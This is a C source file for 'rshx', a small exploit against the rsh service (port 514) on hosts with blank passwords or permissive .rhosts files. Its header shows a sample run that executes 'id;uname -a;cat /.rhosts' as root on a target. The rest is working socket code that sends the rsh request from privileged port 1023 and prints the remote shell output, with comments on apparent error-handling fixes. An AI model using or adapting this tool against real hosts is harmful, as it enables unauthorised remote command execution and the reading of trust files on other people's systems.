/* rshx.c
* ======
 * little exploit for rsh (514/tcp) on hosts with blank passwords
 * or bad .rhosts files; you need root to run this code, as you must
 * open a privileged source port to connect. I came across an old SunOS
* box that was vulnerable to this issue with scanners in nessus &
* metasploit and needed an exploit.
*
* C:\nessus> nasl.exe -t 123.123.123.123 plugins\rsh_users.nasl
* rsh_users.nasl: Success
*
* Example.
*
* # ./rshx 123.123.123.123 root "id;uname -a;cat /.rhosts"
* uid=0(root) gid=0(root)
* SunOS dumdum 5.8 Generic_117350-61 sun4u sparc SUNW,Sun-Fire-V240
* + +
* #
*
* -- prdelka
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#include <arpa/inet.h>
#include <netinet/in.h>
#include <sys/socket.h>
#include <unistd.h>
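/*
 * Send one rsh request field: the string s plus its terminating NUL,
 * looping on partial writes.
 *
 * Returns 0 on success, -1 when send() fails (errno is left as send()
 * set it) or makes no progress.
 */
static int send_field(int fd, const char *s) {
    size_t len = strlen(s) + 1;   /* the NUL is part of the field on the wire */
    while (len > 0) {
        ssize_t sent = send(fd, s, len, 0);
        if (sent <= 0) {
            return -1;
        }
        s += sent;
        len -= (size_t)sent;
    }
    return 0;
}

/*
 * rshx entry point.
 *
 * Opens a TCP connection from local port 1023 to <host>:514, sends one
 * rsh request and copies every byte the server answers to stdout.
 * The four NUL-terminated request fields go out in the same order and
 * with the same bytes as before: an empty first field, argv[2] as the
 * local user, argv[2] again as the remote user, then argv[3] as the
 * command.
 *
 * argv[1]  host as a dotted-quad IPv4 address (inet_addr(), no DNS lookup)
 * argv[2]  user name, used for both user fields
 * argv[3]  command line for the remote shell
 *
 * Exit status: 0 on success and - unchanged from the original - on a
 * usage error or when not running as root; 1 when address parsing, a
 * socket call or the output-buffer allocation fails.
 *
 * Fixes over the original: every socket call is checked instead of
 * being ignored, the reply is printed as the bytes actually received
 * (the old code printf("%s")'d a malloc'd buffer that was never
 * NUL-terminated and partly uninitialised), a recv() error ends the
 * loop instead of spinning on a negative count, and fd/buffer are
 * released on every path.
 */
int main(int argc, char *argv[]) {
    enum { BUF_SIZE = 65535, RSH_PORT = 514, SRC_PORT = 1023 };
    struct sockaddr_in sa_dst;
    struct sockaddr_in sa_loc;
    char *buffer = NULL;
    ssize_t n;
    int fd;
    int rc = 0;

    if (argc < 4) {
        printf("Use with <host> <username> \"command\"\n");
        exit(0);
    }
    /* bind() to a port below 1024 needs root; rshd treats a privileged
     * source port as evidence that the peer is trustworthy, which is
     * the weak trust model this tool exercises. */
    if (getuid() != 0) {
        printf("You should be root to run this\n");
        exit(0);
    }

    memset(&sa_dst, 0, sizeof sa_dst);
    sa_dst.sin_family = AF_INET;
    sa_dst.sin_port = htons(RSH_PORT);
    sa_dst.sin_addr.s_addr = inet_addr(argv[1]);
    if (sa_dst.sin_addr.s_addr == INADDR_NONE) {
        fprintf(stderr, "bad IPv4 address: %s\n", argv[1]);
        return 1;
    }

    fd = socket(AF_INET, SOCK_STREAM, 0);
    if (fd < 0) {
        perror("socket");
        return 1;
    }

    memset(&sa_loc, 0, sizeof sa_loc);
    sa_loc.sin_family = AF_INET;
    sa_loc.sin_port = htons(SRC_PORT);
    sa_loc.sin_addr.s_addr = htonl(INADDR_ANY);   /* same value as inet_addr("0.0.0.0") */
    if (bind(fd, (struct sockaddr *)&sa_loc, sizeof sa_loc) < 0) {
        perror("bind");   /* typically: port 1023 already in use */
        rc = 1;
        goto out_close;
    }
    if (connect(fd, (struct sockaddr *)&sa_dst, sizeof sa_dst) < 0) {
        perror("connect");
        rc = 1;
        goto out_close;
    }

    /* Wire bytes: \0 user \0 user \0 command \0 — identical to the
     * seven separate send() calls of the original. */
    if (send_field(fd, "") < 0 ||
        send_field(fd, argv[2]) < 0 ||
        send_field(fd, argv[2]) < 0 ||
        send_field(fd, argv[3]) < 0) {
        perror("send");
        rc = 1;
        goto out_close;
    }

    buffer = malloc(BUF_SIZE);
    if (buffer == NULL) {
        perror("malloc");
        rc = 1;
        goto out_close;
    }

    /* The reply starts with a one-byte status (0 = request accepted;
     * presumably anything else is a refusal whose text follows). The
     * byte is consumed and not printed, exactly as before. */
    n = recv(fd, buffer, 1, 0);
    if (n < 0) {
        perror("recv");
        rc = 1;
        goto out_free;
    }
    if (n == 0) {
        goto out_free;   /* peer closed before sending a status byte */
    }

    /* Copy the rest of the stream verbatim. Only the bytes actually
     * received are written, so no NUL terminator is needed, and a
     * negative count leaves the loop instead of being printed. */
    while ((n = recv(fd, buffer, BUF_SIZE, 0)) > 0) {
        fwrite(buffer, 1, (size_t)n, stdout);
    }
    if (n < 0) {
        perror("recv");
        rc = 1;
    }

out_free:
    free(buffer);
out_close:
    close(fd);
    return rc;
}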